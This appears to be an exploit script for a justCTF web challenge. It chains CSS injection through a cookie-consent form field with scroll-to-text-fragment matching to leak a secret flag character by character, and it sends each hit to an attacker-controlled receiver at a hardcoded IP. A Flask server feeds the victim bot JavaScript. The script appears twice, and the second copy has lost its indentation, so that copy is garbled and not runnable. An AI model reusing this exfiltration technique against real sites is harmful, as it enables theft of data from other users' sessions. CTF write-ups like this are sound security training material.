haqpl/sploit.py

## sploit.py
from flask import Flask
from flask import request
import string
import requests
from bs4 import BeautifulSoup

URL = "http://ninja.web.jctf.pro"
RECEIVER = "http://51.38.138.162:1338"
proxy = {}

all_chars = string.ascii_lowercase + '_' + '}'
s = requests.Session()

won = False
i = 0
flag = "justCTF{"

def retrive_csrf(page):
    resp = s.get(f"{URL}/{page}", proxies=proxy).text
    return BeautifulSoup(resp, "html.parser").find_all('input')[0].attrs.get('value')

def register(username, password):
    resp = s.get(f"{URL}/register", proxies=proxy).text
    csrf_token = retrive_csrf("register")
    burp0_data = {"csrf_token": csrf_token, "username": username, "password": password, "submit": "Register"}
    s.post(f"{URL}/register", data=burp0_data, proxies=proxy)
    return

def login(username, password):
    csrf_token = retrive_csrf("login")
    burp0_data = {"csrf_token": csrf_token, "username": username, "password": password, "submit": "Sign In"}
    s.post(f"{URL}/login", data=burp0_data, proxies=proxy)
    return

def consent(title, css_payload, link):
    csrf_token = retrive_csrf("consents")
    burp0_data = {"csrf_token": csrf_token, "title": title, "color_palette": css_payload, "link": link, "submit": "Generate cookie consent"}
    resp = s.post(f"{URL}/consents", data=burp0_data, proxies=proxy).text
    return BeautifulSoup(resp, "html.parser").find('a',text=title)['href'].split('/')[2].split('?')[0]

def setup():
    global note_id
    user, pwd = 'haqpl', 'haqpl'
    register(user, pwd)
    login(user, pwd)
    # CSS style applied to the matched STTF with ping back to us
    css_payload = f"#FFFFFF;}} :target::before {{ content : url({RECEIVER}/hit)"
    # Ninja Cookie gadget on which bot will click after visit, triggering STTF
    sttf = ':~:text=Hello" class="lg-cc lg-cc__button_type_clear'
    note_id = consent('win', css_payload, sttf)

setup()

app = Flask(__name__)

def gen_redirect(c):
    global flag, note_id, i
    print("Current char: ", all_chars[i-1])
    """
    #:~:text=[prefix-,]textStart[,textEnd][,-suffix]
          context  |-------match-----|  context
    """
    payload = f"""
    <script>
        const c = "{c}";
        var flag = "{flag}";
        const sleep = d => new Promise(r=>setTimeout(r,d));

        window.onload = async () => {{
            //try to match subsequent flag characters
            payload = `:~:text=${{flag}}-,${{c}}" class="lg-cc lg-cc__button_type_clear"`;
            myk = window.open('{URL}/consent/{note_id}?link='+encodeURIComponent(payload));
            myk.focus();
            await sleep(100);
            myk.close();
            location="/";
        }}
    </script>
    """
    return payload

@app.route('/')
def redirect():
    global i, won
    i+=1
    return gen_redirect(all_chars[i-1]) if (not won and len(all_chars)>i-1) else "Thank you for cooperation"

@app.route('/hit')
def receiver():
    global i, flag, won
    leaked = all_chars[i-1]
    flag+=leaked
    i=0
    print("Current flag:", flag)
    if leaked == "}":
        won = True
    return "ok"
	from flask import Flask
	from flask import request
	import string
	import requests
	from bs4 import BeautifulSoup

	URL = "http://ninja.web.jctf.pro"
	RECEIVER = "http://51.38.138.162:1338"
	proxy = {}

	all_chars = string.ascii_lowercase + '_' + '}'
	s = requests.Session()

	won = False
	i = 0
	flag = "justCTF{"

	def retrive_csrf(page):
	resp = s.get(f"{URL}/{page}", proxies=proxy).text
	return BeautifulSoup(resp, "html.parser").find_all('input')[0].attrs.get('value')

	def register(username, password):
	resp = s.get(f"{URL}/register", proxies=proxy).text
	csrf_token = retrive_csrf("register")
	burp0_data = {"csrf_token": csrf_token, "username": username, "password": password, "submit": "Register"}
	s.post(f"{URL}/register", data=burp0_data, proxies=proxy)
	return

	def login(username, password):
	csrf_token = retrive_csrf("login")
	burp0_data = {"csrf_token": csrf_token, "username": username, "password": password, "submit": "Sign In"}
	s.post(f"{URL}/login", data=burp0_data, proxies=proxy)
	return

	def consent(title, css_payload, link):
	csrf_token = retrive_csrf("consents")
	burp0_data = {"csrf_token": csrf_token, "title": title, "color_palette": css_payload, "link": link, "submit": "Generate cookie consent"}
	resp = s.post(f"{URL}/consents", data=burp0_data, proxies=proxy).text
	return BeautifulSoup(resp, "html.parser").find('a',text=title)['href'].split('/')[2].split('?')[0]

	def setup():
	global note_id
	user, pwd = 'haqpl', 'haqpl'
	register(user, pwd)
	login(user, pwd)
	# CSS style applied to the matched STTF with ping back to us
	css_payload = f"#FFFFFF;}} :target::before {{ content : url({RECEIVER}/hit)"
	# Ninja Cookie gadget on which bot will click after visit, triggering STTF
	sttf = ':~:text=Hello" class="lg-cc lg-cc__button_type_clear'
	note_id = consent('win', css_payload, sttf)

	setup()

	app = Flask(__name__)

	def gen_redirect(c):
	global flag, note_id, i
	print("Current char: ", all_chars[i-1])
	"""
	#:~:text=[prefix-,]textStart[,textEnd][,-suffix]
	context \|-------match-----\| context
	"""
	payload = f"""
	<script>
	const c = "{c}";
	var flag = "{flag}";
	const sleep = d => new Promise(r=>setTimeout(r,d));

	window.onload = async () => {{
	//try to match subsequent flag characters
	payload = `:~:text=${{flag}}-,${{c}}" class="lg-cc lg-cc__button_type_clear"`;
	myk = window.open('{URL}/consent/{note_id}?link='+encodeURIComponent(payload));
	myk.focus();
	await sleep(100);
	myk.close();
	location="/";
	}}
	</script>
	"""
	return payload

	@app.route('/')
	def redirect():
	global i, won
	i+=1
	return gen_redirect(all_chars[i-1]) if (not won and len(all_chars)>i-1) else "Thank you for cooperation"

	@app.route('/hit')
	def receiver():
	global i, flag, won
	leaked = all_chars[i-1]
	flag+=leaked
	i=0
	print("Current flag:", flag)
	if leaked == "}":
	won = True
	return "ok"